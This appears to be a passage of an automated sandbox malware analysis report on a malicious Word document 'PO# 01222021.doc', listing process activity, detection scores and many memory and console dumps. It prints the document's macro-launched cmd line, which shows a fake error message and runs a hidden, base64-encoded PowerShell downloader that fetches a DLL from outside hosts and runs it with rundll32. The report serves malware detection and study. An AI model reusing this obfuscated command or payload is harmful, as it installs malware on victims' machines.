Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000AE9E 7_2_1000AE9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100026A0 7_2_100026A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008EA1 7_2_10008EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100112B3 7_2_100112B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E0B6 7_2_1001E0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BEBD 7_2_1000BEBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100048C7 7_2_100048C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004AD3 7_2_10004AD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100068D8 7_2_100068D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100084D8 7_2_100084D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100042DE 7_2_100042DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E4E1 7_2_1001E4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010CE0 7_2_10010CE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100038E1 7_2_100038E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012CE3 7_2_10012CE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A2E5 7_2_1001A2E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E8F6 7_2_1000E8F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001EF9 7_2_10001EF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006AFC 7_2_10006AFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007306 7_2_10007306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CF07 7_2_1001CF07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003F0A 7_2_10003F0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013F16 7_2_10013F16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018721 7_2_10018721
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019726 7_2_10019726
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C92D 7_2_1001C92D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001732F 7_2_1001732F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D535 7_2_1000D535
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016334 7_2_10016334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014D39 7_2_10014D39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003743 7_2_10003743
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F54C 7_2_1000F54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001894D 7_2_1001894D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010950 7_2_10010950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011F54 7_2_10011F54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB58 7_2_1001CB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BF69 7_2_1001BF69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007B6A 7_2_10007B6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A16A 7_2_1000A16A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019D6D 7_2_10019D6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001197B 7_2_1001197B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DD80 7_2_1001DD80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10017B8D 7_2_10017B8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B598 7_2_1001B598
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001539F 7_2_1001539F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000799F 7_2_1000799F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E9A2 7_2_1001E9A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EBA4 7_2_1000EBA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021C0 7_2_100021C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C1C2 7_2_1001C1C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100107D3 7_2_100107D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100095DD 7_2_100095DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D5DF 7_2_1001D5DF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100129E3 7_2_100129E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F7EF 7_2_1000F7EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100033F4 7_2_100033F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A7FA 7_2_1000A7FA
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: PO# 01222021.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: PO# 01222021.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/8@1/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$# 01222021.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC2C2.tmp Jump to behavior
Source: PO# 01222021.doc OLE indicator, Word Document stream: true
Source: PO# 01222021.doc OLE document summary: title field not present or empty
Source: PO# 01222021.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............`........................... .a.......a...............".....X.".............#...............................h.......5kU......."..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............`...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........".....L................."..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.N..............................IP..... .........#.............}..v....x....... ............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................D.j..... #...............#.............}..v............0.N...............[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................G.j......................#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................G.j......[...............#.............}..v....h.......0.N.............(.[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............EG.j.....i................#.............}..v.....N......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............EG.j..... #...............#.............}..v.....N......0.N.............x.[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....M[...............#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....@.................#.............}..v............0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....M[...............#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....@.................#.............}..v............0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....M[...............#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....@.................#.............}..v............0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.N.............HJ[.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j......................#.............}..v............0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.7.............}..v.... .......0.N.............HJ[.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j......................#.............}..v.... ......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j..... ................#.............}..v....X!......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... (......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....(................#.............}..v....X)......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... 0......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....0................#.............}..v....X1......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... 8......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....8................#.............}..v....X9......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... @......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....@................#.............}..v....XA......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... H......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H................#.............}..v....XI......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... P......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....P................#.............}..v....XQ......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... X......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....X................#.............}..v....XY......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... `......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....`................#.............}..v....Xa......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... h......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....h................#.............}..v....Xi......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... p......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....p................#.............}..v....Xq......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... x......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....x................#.............}..v....Xy......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j......................#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j......................#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v............0.N.....................j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....P.................#.............}..v............0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v....x.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................B.............................. .L...............#..............................................J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v............0.N.....................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....8.......0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....M[...............#.............}..v............0.N.............HJ[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............J[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................5z.j....E.h...............#.............}..v....xH......0.N...............[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................5z.j....E.h...............#.............}..v............0.N...............[............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: PO# 01222021.doc Virustotal: Detection: 66%
Source: PO# 01222021.doc Metadefender: Detection: 48%
Source: PO# 01222021.doc ReversingLabs: Detection: 67%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwA